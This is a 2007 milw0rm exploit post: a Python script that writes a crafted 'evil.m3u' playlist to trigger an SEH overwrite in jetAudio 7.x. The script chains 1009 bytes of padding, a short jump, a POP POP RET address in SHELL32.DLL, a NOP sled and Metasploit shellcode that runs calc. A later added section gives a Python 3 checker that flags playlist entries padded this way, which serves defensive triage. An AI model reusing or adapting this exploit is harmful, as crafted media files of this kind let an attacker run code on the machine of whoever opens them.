jetAudio 7.x m3u File Local SEH Overwrite Exploit

#!/usr/bin/python
# jetAudio 7.x (m3u File) 0day Local SEH Overwrite Exploit
# Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
# Tested on: jetAudio 7.0.3 Basic / 2k SP4 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Just for fun ;)
##

from struct import pack

m3u = ("#EXTM3U\nhttp://%s")

shellcode = (
"\x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6"
"\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7"
"\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58"
"\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae"
"\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60"
"\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf"
"\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70"
"\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33"
"\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04"
"\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2")

NEXT_SEH_RECORD = 0x909006EB            # JMP SHORT + 0x06
SE_HANDLER = 0x7CEA61F7                 # POP POP RET (SHELL32.DLL / 2k SP4 Polish)

buf   = "CLICK ME"
buf   += "\x20" * 1009
buf   += pack("<L", NEXT_SEH_RECORD)
buf   += pack("<L", SE_HANDLER)
buf   += "\x90" * 128
buf   += shellcode

m3u %= buf

fd = open("evil.m3u", "w")
fd.write(m3u)
fd.close()

print "DONE"

# EoF

# milw0rm.com [2007-10-14]




h07                                                                                          10/14/2007
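
Added example, not part of the original milw0rm post: a small Python 3 triage check that flags playlist entries shaped like the one the script above writes (a short visible label, a long run of filler bytes, then binary data on a single http:// line). The two thresholds, the function names and both sample playlists are assumptions constructed for illustration.

```python
from itertools import groupby

MAX_ENTRY_LEN = 512   # assumption: generous cap for a legitimate URL or path
MAX_BYTE_RUN = 64     # assumption: longest tolerated run of one repeated byte


def longest_run(data: bytes) -> int:
    """Length of the longest run of a single repeated byte value."""
    return max((sum(1 for _ in grp) for _, grp in groupby(data)), default=0)


def scan_m3u(data: bytes):
    """Return [(line_number, [reasons])] for entries that look like padding."""
    findings = []
    for lineno, raw in enumerate(data.splitlines(), start=1):
        entry = raw.strip()
        if not entry or entry.startswith(b"#"):
            continue  # blank lines and #EXTM3U / #EXTINF directives
        reasons = []
        if len(entry) > MAX_ENTRY_LEN:
            reasons.append("entry is %d bytes (cap %d)" % (len(entry), MAX_ENTRY_LEN))
        run = longest_run(entry)
        if run > MAX_BYTE_RUN:
            reasons.append("run of %d identical bytes" % run)
        # High or control bytes can be legitimate (non-ASCII file names in a
        # local code page), so report them as a supporting signal only.
        odd = sum(1 for b in entry if b < 0x20 or b > 0x7E)
        if odd and reasons:
            reasons.append("%d bytes outside printable ASCII" % odd)
        if reasons:
            findings.append((lineno, reasons))
    return findings


# Constructed samples: an ordinary playlist, and one entry with the same
# shape as the generated file (short text, long filler, then binary data).
BENIGN = b"#EXTM3U\n#EXTINF:215,Artist - Title\nhttp://example.com/live.mp3\n"
SUSPECT = b"#EXTM3U\nhttp://CLICK ME" + b"\x20" * 1009 + b"\x80\x81\x82\x83\n"

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, scan_m3u(blob))
```

Read the file in binary mode before calling scan_m3u so that the byte values are not altered by text decoding.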

				